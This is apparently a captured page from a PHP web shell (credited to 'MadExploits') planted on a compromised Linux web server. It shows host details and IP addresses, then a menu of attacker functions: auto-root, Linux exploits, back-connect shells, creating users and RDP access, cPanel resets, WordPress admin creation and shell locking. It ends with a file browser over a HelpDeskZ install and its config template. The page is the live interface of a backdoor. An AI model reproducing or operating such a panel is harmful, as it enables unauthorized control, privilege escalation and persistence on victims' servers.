Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.69.58.117
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
helpdeskz /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
Helpdesk.php
1009
B
-rw-r--r--
clone.php
4.67
KB
-rw-r--r--
edit.php
4.93
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
9.19
KB
-rw-r--r--
fileindex.php
113
B
-rw-r--r--
import.php
4.46
KB
-rw-r--r--
info.xml
3.3
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
5.2
KB
-rw-r--r--
install.xml
1.66
KB
-rw-r--r--
md5
2.04
KB
-rw-r--r--
notes.txt
203
B
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
5.11
KB
-rw-r--r--
upgrade.xml
380
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Helpdesk.php
<?php /** * @package EvolutionScript * @author: EvolutionScript S.A.C. * @Copyright (c) 2010 - 2020, EvolutionScript.com * @link http://www.evolutionscript.com */ namespace Config; use CodeIgniter\Config\BaseConfig; class Helpdesk extends BaseConfig { #Database host const DB_HOST = '[[softdbhost]]'; #Database username const DB_USER = '[[softdbuser]]'; #Database password const DB_PASSWORD = '[[softdbpass]]'; #Database name const DB_NAME = '[[softdb]]'; #Database table prefix const DB_PREFIX = '[[dbprefix]]'; #Database port, do not change it if you are not sure const DB_PORT = 3306; #URL of your helpdesk const SITE_URL = '[[softurl]]'; #Upload path for images used in HTML editor and logo const UPLOAD_PATH = FCPATH.'upload'; #Default helpdesk language const DEFAULT_LANG = 'en'; #URI name to access to staff panel. Ex: staff / then you can access in http://helpdesk.com/staff const STAFF_URI = 'staff'; }
Close